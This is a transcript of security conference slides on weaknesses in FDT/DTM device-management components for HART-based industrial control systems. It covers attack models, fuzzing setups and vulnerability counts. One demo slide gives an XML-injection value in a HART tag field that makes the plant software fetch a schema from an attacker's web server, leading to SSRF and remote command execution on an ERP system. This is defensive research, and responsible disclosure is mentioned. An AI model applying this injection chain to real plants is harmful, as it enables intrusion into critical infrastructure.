dtm components: shadow keys to the ics...
TRANSCRIPT
![Page 1: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/1.jpg)
DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM
Alexander @dark_k3y BolshevGleb @cherboff Cherbov
Svetlana Cherkasova
![Page 2: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/2.jpg)
whoami: dark_k3y
Alexander Bolshev (@dark_key)
IS auditor @
Ph.D.
Assistant Professor @ SPbETU
Distributed systems researcher
Yet another man wearing “some-color hat”
![Page 3: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/3.jpg)
whoami: cherboff
Gleb Cherbov (@cherboff)
IS researcher @
Information security researcher
![Page 4: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/4.jpg)
whoami:
Svetlana Cherkasova
IS researcher @
Binary Reverse Engineer
DTM COMPONENTS: SHADOW KEYSTO THE ICS KINGDOM
![Page 5: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/5.jpg)
Agenda
• Introduction to FDT/DTM
• Research scope
• Fuzzing technologies
• Vulnerabilities and weaknesses statistics
• Vulns && funny things
• FDT 2.0
• Conclusions
![Page 6: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/6.jpg)
Intro to FDT/DTM
![Page 7: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/7.jpg)
ICS 101• ICS stands for Industrial Control System.
• Today, ICS infrastructures are commonly used in every factory and even in your house, too!
• ICS collects data from remote stations (also called field devices), processes them, and uses automated algorithms or operator-driven supervisory to create commands to be sent back.
• Thousands of field devices could exist at one facility.
• To control them, Plant Asset Management Systems (PAS or AMS) were invented.
• Plant Assets Management Software = tools for managing plants assets, which lie on the upper/medium levels of ICS and control/monitor/configure field devices.
![Page 8: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/8.jpg)
Field protocols
•HART (current loop, 4-20 mA)
•Profibus DP (RS-485)
•Profibus PA (MBP)
•Modbus (RS-485)
•Foundation Fieldbus H1 (MBP)
•…
![Page 9: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/9.jpg)
Field devices
![Page 10: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/10.jpg)
What is FDT/DTM?
• “The FDT concept defines the interfaces between device-specific software components provided by the device supplier and the engineering tool of the control system manufacturer. The device-specific software component is called DTM (Device Type Manager).” © FDT Group, maintainer of FDT/DTM specification
In short:
• FDT standardizes the communication and configuration interface between all field devices and host systems
• DTM provides a unified structure for accessing device parameters, configuring and operating the devices, and diagnosing problems
![Page 11: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/11.jpg)
FDT/DTM layers*
DTM COMPONENTS: SHADOW KEYSTO THE ICS KINGDOM
*Picture from http://www.automationworld.com/fdt-group-wants-your-input-yes-yours
![Page 12: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/12.jpg)
Typical places of DTMs in modern ICS systems
Corporate network
ERP
MES
PLC2,3…PLC1
PLC7,8…
Field devices
Routers/Firewalls
OPC
DCS
HMI
Industrial bus
AMS
![Page 13: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/13.jpg)
DTM components key concepts• It is generally no standalone tool
• ActiveX interfaces defined by the FDT-Spec.
• All rules of the device known
• All user dialogs contained
• Automatic generation of dependent parameters
• Reading and writing of parameters from/to the field device
• Diagnostic functions customized for the device
• No direct connection to any other device
• No information on the engineering environment
• Support for one or more device types
![Page 14: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/14.jpg)
FDT/DTM simplified
DTM COMPONENTS: SHADOW KEYSTO THE ICS KINGDOM
Industrial bus
PAS
Modem/Gateway
CommDTM
DeviceDTM
Frame Application
COM Container
CO
M C
om
po
nen
ts
Transmitters && I/O
![Page 15: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/15.jpg)
E&H FieldCare (PAS) – a typical frame application
![Page 16: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/16.jpg)
FDT/DTM: architecture internals
![Page 17: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/17.jpg)
DTM multilayer concept
![Page 18: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/18.jpg)
FDT/DTM architecture
DTM COMPONENTS: SHADOW KEYSTO THE ICS KINGDOM
Developers’ dream…
![Page 19: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/19.jpg)
FDT/DTM architecture
DTM COMPONENTS: SHADOW KEYSTO THE ICS KINGDOM
Developers’ dream… …cruel reality.vs.
![Page 20: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/20.jpg)
DTM implementations
• All of this sounds great, but in reality, DTM components are based on such technologies and use such “features” as:• OLE32
• ActiveX
• Visual Basic 6.0
• .Net
• COM
• XML
• STA
• RPC
![Page 21: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/21.jpg)
FDT/DTM Inside
![Page 22: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/22.jpg)
FDT/DTM Inside
![Page 23: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/23.jpg)
TODO: <Company name>
![Page 24: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/24.jpg)
FDT/DTM: COM Apartments
rsdn.ru
![Page 25: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/25.jpg)
FDT/DTM: COM ApartmentsCoInitializeEx (NULL,
COINIT_APARTMENTTHREADED); // Thread 2
CoInitializeEx (NULL, COINIT_MULTITHREADED);
// Thread 3
CoInitializeEx (NULL, COINIT_MULTITHREADED);
// Thread 4
CoInitialize (NULL);
// Thread 5
dwSyncThread = GetCurrentThreadId ();
MSG msg = {0};
while (!sync)
{
GetMessage(&msg, NULL, 0,0);
TranslateMessage(&msg);
DispatchMessage(&msg);
}
if (g_Apartment)
CoInitializeEx(NULL,
COINIT_APARTMENTTHREADED |
COINIT_DISABLE_OLE1DDE);
![Page 26: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/26.jpg)
FDT/DTM Inside
![Page 27: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/27.jpg)
ASLR
DEP
SafeSeh
Stack Cookies
![Page 28: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/28.jpg)
Custom XML Parsers
mov [ebp+var_3C], esp
push offset "x-schema:FMPDeviceCatalogSchema.xml;x-s"...
push offset "<?xml version=\"1.0\"?>\n“
lea ecx, [ebp+this]
mov byte ptr [ebp+var_4], 17h
call sub_1150F
push offset "<FDT xmlns=\"x-schema:DTMParameterSchem"...
push offset " <DtmDevice fdt:tag=\"\">\n“
lea ecx, [ebp+var_3C]
push offset " </DtmDevice>\n“
lea ecx, [ebp+var_3C]
call sub_110D8
push offset "</FDT>\n“
lea ecx, [ebp+var_3C]
![Page 29: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/29.jpg)
Research scope
![Page 30: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/30.jpg)
Our research goals and scope• In our research, we want to answer these questions:
• Why is FDT/DTM architecture weak?
• What kind of vulnerabilities in DTM components could cause a compromise of ICS infrastructure?
• What about FDT 2.0 security?
• Also, we want to take some sample of all DTMs and find out how much of them have weaknesses and/or vulnerabilities
• Certified DTMs can be found in the catalog at http://www.fdtgroup.org/product-catalog/certified-dtms
• There are tons of DTMs
• We’ve decided to stick only to HART protocol and analyze ~100 DTMs
![Page 31: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/31.jpg)
Why only DTMs for HART devices?
• We are familiar with this protocol
• We have hardware tools to work with and attack HART devices
• HART is used in critical industries, such as power plants, chemical factories, oil & gas, etc.
![Page 32: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/32.jpg)
HART in two slides: first
• Highway Addressable Remote Transducer Protocol
• Developed by Rosemount in mid-1980s
• Physical layer: FSK (copper wiring, 4-20 mA current loop)
• Current loop line length can reach 3 km => possible physical security problem
• Master-slave, half-duplex, 2200 Hz, 1200 bps
• No Authentication/Authorization/Cryptography (*wired)
• HART over IP version exists
• Max packet length – 255 B (standard), ~8 kB (reality).
DTM COMPONENTS: SHADOW KEYSTO THE ICS DM
![Page 33: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/33.jpg)
HART in two slides: second
![Page 34: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/34.jpg)
Attack model 1: through current loop
HART gateway/master
HART transmitter
High-levelprotocols
Attacker
MitMing and forging real
HART device
PAS with vulnerableDTM
Current loop
![Page 35: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/35.jpg)
Real world
HART transmitter connected tocurrent loop
![Page 36: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/36.jpg)
Real world
HART transmitter connected tocurrent loop
![Page 37: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/37.jpg)
Real world
Wired HART transmitter
Wireless HART transmitter
![Page 38: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/38.jpg)
Tools and methods for MITMing HART CL
ICSCorsair
HRTShield for Arduino
For more info on the topic, see: “HART as an attack vector: from current loop to application layer” (S4x14) and “ICSCorsair: how I will PWN your ERP from 4-20mA current loop” (BH USA’14).
![Page 39: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/39.jpg)
CL injection demo
![Page 40: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/40.jpg)
Demo Infrastructure
Corporate network
ERP
Transmitter
Firewall (only HTTP traffic allowed)
FieldCare (PAS)
Current loop
(HART Analog 4-
20mA line)
Ethernet
HART modem
![Page 41: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/41.jpg)
Video demo
![Page 42: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/42.jpg)
Explanation
Current loop
HART gateway/master
XML data
HART Command 22Long tag change packet
A' xmlns='x-schema:http://q45.ru
Attacker
HART transmitter
XMLI
Evil web server
Request for remote XSD schema
Reply (XSD with SSRF)SSRF
1 2
3
4
5
Internet
PAS (FieldCare)
6
SAP remote command execution exploit queryRCE
ERP
![Page 43: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/43.jpg)
Let’s return to attack models
![Page 44: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/44.jpg)
Attack model 2: through other low-lvl protocols
Profibus/Ethernet GW
HART transmitter
PAS with vulnerableDTM
High-levelprotocols
e.g. Ethernet, Wi-Fi, radio…
Attacker
Attacking Profibus DP
line
Current loop
Profibus DP
![Page 45: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/45.jpg)
Attack model 3: through upper levels
HART gateway/master
HART transmitter
PAS with vulnerableDTM
High-levelprotocols
e.g. Ethernet, Wi-Fi, other…
Attacker
MitMinggateway and
forging HART-IP response
Current loop
![Page 46: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/46.jpg)
Real world: Emerson marketing demo
Broadband radiochannel toICS DCS
Wireless HART transmitters,Wireless HART GWs
to radiochannel
![Page 47: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/47.jpg)
Research scope in one slide
24 Vendors
114 DTMs
752Devices
from for
![Page 48: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/48.jpg)
Some vendors
![Page 49: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/49.jpg)
Two frameworks
dtmManager/dtmGenerator
DTMStudio/DTMLibrary/CoDIA
15; 13%
35; 31%64; 56%
Other/Unknown/Undetectable
![Page 50: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/50.jpg)
Fuzzing
![Page 51: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/51.jpg)
How have we fuzzed?
DTM components may be written on different languages and use different runtimes, process models, etc. Thus, we’ve used three different fuzzing methods:
1. Emulate CommDTM and put fuzzed protocol data directly into DeviceDTM (fastest)
2. Emulate device through a virtual serial port
3. Emulate device with hardware (HRTshield, ICSCorsair, etc.) (slowest)
![Page 52: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/52.jpg)
Tools that we’ve created for fuzzing
Software:
• HRTParser (HART packet creation/parsing library)
• Ruby HART emulator
• HART DTM Fuzzer (CommDTM)
• FuzzFrame (FDT Frame emulation)
• DTMSpy (logging DTM call stack/XML dataflow).
Hardware:
• ICSCorsair
• HRTShield
![Page 53: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/53.jpg)
Fuzzing with special CommDTM component
PAS (FieldCare)
TargetDeviceDTM
HART Fuzzer DTMRadamsa
HRTParser lib
HART EmulatorRuby
UDP Server
AutoIT
![Page 54: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/54.jpg)
Fuzzing with Virtual Serial Ports
PAS (FieldCare)
HART CommDTM(CodeWrights)
HART EmulatorRuby
HRTParser lib
Radamsa
AutoIT
TargetDeviceDTM
![Page 55: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/55.jpg)
Fuzzing with hardware tools
HART Modem
HART “transmitter”(ICSCorsair)
Current loopUSB
PAS (FieldCare)
HART CommDTM(CodeWrights)
USB
HRTParser lib
Radamsa
AutoIT
HART EmulatorRuby
TargetDeviceDTM
![Page 56: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/56.jpg)
Results & statistics
![Page 57: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/57.jpg)
Found vulnerabilities
Vulnerable,29, 25%
Not vulnerable; 85; 75%
BY DTM
Vulnerable, 501, 67%
Not vulnerable, 251, 33%
BY DEVICE
![Page 58: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/58.jpg)
Types of found vulnerabilities (by DTM)
RCE 3
DoS 6
Other 9
Possible RCE 7
XML injection 2
Race Condition 2
Total: 29 vulnerabilities
![Page 59: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/59.jpg)
Tons of DoS and the like
![Page 60: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/60.jpg)
But…
SoZ, responsible disclosure!
![Page 61: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/61.jpg)
Vendor statistics
GE Oil & Gas
